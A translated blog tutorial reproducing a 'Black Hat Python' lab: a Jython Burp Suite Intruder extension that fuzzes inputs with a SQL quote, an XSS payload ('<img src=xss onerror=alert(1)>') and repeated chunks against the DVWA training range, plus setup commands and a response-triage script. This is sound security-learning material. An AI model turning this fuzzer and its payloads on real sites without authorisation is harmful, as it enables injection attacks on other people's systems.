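I recently received a network security book, "Black Hat Python" (《python黑帽子》), as a gift from the Publishing House of Electronics Industry. The book contains 24 experiments in total, and today I reproduce experiment 15 (a Burp Suite payload generator plugin). My test environment is a MacBook Pro + a Kali virtual machine + the DVWA online range. Only a Python 2.7 environment is currently supported, so I adjusted the symlink slightly, then uninstalled the JDK and Burp Suite that were on Kali and ended up using JDK 1.8 and Burp Suite 1.7.36, which reproduced the experiment successfully. By the way, after doing many experiments, it is simply a matter of practice.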
ailx10
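Step 1: Prepare the environment
Install JDK 1.8 on Kali
apt-get update
apt-get install software-properties-common
apt-add-repository 'deb http://security.debian.org/debian-security stretch/updates main'
apt-get update
apt-get install openjdk-8-jdk
Select JDK 1.8
update-alternatives --config java
Update the python2 symlink
ln -s /usr/bin/python2 /usr/bin/python
Install the older Burp Suite 1.7.36 (quote the URL so the shell does not treat & as a background operator, and name the output file to match the next command)
wget -O burpsuite_community_linux_v1_7_36.sh 'https://portswigger.net/burp/releases/download?product=community&version=1.7.36&type=linux'
sudo chmod +x burpsuite_community_linux_v1_7_36.sh
sudo ./burpsuite_community_linux_v1_7_36.sh
The import succeeded. Note that the path must not contain Chinese characters.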
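Step 2: Prepare the test website
Use the DVWA online range [1]
Step 3: Hands-on practice
1. Open the XSS module and submit a string.
2. In Burp's Proxy module, send the payload to the Intruder module.
3. In the Intruder module, on the Payloads page, set the payload type to Extension-generated, then choose BHP Payload Generator under Payload Options, and you are done.
4. Click Start attack. This did in fact trigger the pop-up, but the results are not displayed in a friendly way.
Reference code: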
# -*- coding: utf-8 -*-
# @Time : 2022/6/14 7:15 PM
# @Author : ailx10
# @File : bhf_fuzzer.py
# Runs inside Burp Suite under Jython 2.7; the burp and java modules are provided by Burp.
from burp import IBurpExtender
from burp import IIntruderPayloadGeneratorFactory
from burp import IIntruderPayloadGenerator
from java.util import List, ArrayList
import random


class BurpExtender(IBurpExtender, IIntruderPayloadGeneratorFactory):
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        # Register this class so Intruder lists it under "Extension-generated"
        callbacks.registerIntruderPayloadGeneratorFactory(self)
        return

    def getGeneratorName(self):
        return "BHP Payload Generator"

    def createNewInstance(self, attack):
        return BHPFuzzer(self, attack)


class BHPFuzzer(IIntruderPayloadGenerator):
    def __init__(self, extender, attack):
        self._extender = extender
        self._helpers = extender._helpers
        self._attack = attack
        self.max_payloads = 10   # stop after this many generated payloads
        self.num_iterations = 0
        return

    def hasMorePayloads(self):
        if self.num_iterations == self.max_payloads:
            return False
        else:
            return True

    def getNextPayload(self, current_payload):
        # Burp passes the base value as a byte array; convert it to a string
        payload = "".join(chr(x) for x in current_payload)
        payload = self.mutate_payload(payload)
        self.num_iterations += 1
        return payload

    def reset(self):
        self.num_iterations = 0
        return

    def mutate_payload(self, original_payload):
        # An empty base value cannot be split: randint(0, -1) would raise ValueError
        if not original_payload:
            return original_payload
        picker = random.randint(1, 3)
        offset = random.randint(0, len(original_payload) - 1)
        front, back = original_payload[:offset], original_payload[offset:]
        # SQL
        if picker == 1:
            front += "'"
        # XSS
        elif picker == 2:
            front += "<img src=xss onerror=alert(1)>"
        # Take a chunk from the start of the original payload, repeat it
        # 1 to 10 times, and append it to the end of the front block
        elif picker == 3:
            chunk_length = random.randint(0, len(back) - 1)
            repeater = random.randint(1, 10)
            for _ in range(repeater):
                front += original_payload[:offset + chunk_length]
        return front + back
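Step 4 notes that the Intruder results are hard to read. The following added example (not from the book or the original post) sorts responses by what happened to the fuzzer's marker: reflected raw, reflected HTML-encoded, SQL error disclosed, or server error. The names `classify` and `triage`, the SQL error signatures and the sample responses are assumptions constructed for illustration.

```python
# Added example: triage for responses to payloads from BHPFuzzer.mutate_payload.
# Runs without Burp on Python 2.7 or 3. Sample responses are constructed.
import re

XSS_MARKER = "<img src=xss onerror=alert(1)>"  # marker string used by the fuzzer
XSS_ENCODED = XSS_MARKER.replace("<", "&lt;").replace(">", "&gt;")

# Assumed error signatures; extend them for the database behind the target.
SQL_ERRORS = re.compile(r"You have an error in your SQL syntax|SQLSTATE\[", re.I)


def classify(payload, status, body):
    """Return the findings for one payload/response pair."""
    findings = []
    if XSS_MARKER in payload:
        if XSS_MARKER in body:
            findings.append("xss-marker-raw")      # output encoding missing
        elif XSS_ENCODED in body:
            findings.append("xss-marker-encoded")  # output encoding applied
    if "'" in payload and SQL_ERRORS.search(body):
        findings.append("sql-error-disclosed")
    if status >= 500:
        findings.append("server-error")
    return findings


def triage(results):
    """results: (payload, status, body) tuples; keep only rows with findings."""
    rows = []
    for payload, status, body in results:
        findings = classify(payload, status, body)
        if findings:
            rows.append((payload, status, findings))
    return rows


SAMPLE = [  # constructed responses, not captured from DVWA
    ("te" + XSS_MARKER + "st", 200, "<pre>Hello te" + XSS_MARKER + "st</pre>"),
    ("te" + XSS_MARKER + "st", 200, "<pre>Hello te" + XSS_ENCODED + "st</pre>"),
    ("te'st", 200, "You have an error in your SQL syntax; check the manual"),
    ("tetetest", 200, "<pre>Hello tetetest</pre>"),
    ("tetetetetest", 500, "Internal Server Error"),
]

if __name__ == "__main__":
    for payload, status, findings in triage(SAMPLE):
        print("%-40r %d %s" % (payload, status, ", ".join(findings)))
```

A row marked `xss-marker-raw` points at a sink that needs output encoding, while `xss-marker-encoded` shows the encoding is already in place there.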
References
- [1] DVWA online range: https://www.vulnspy.com/dvwa/
Published 2022-06-14 21:15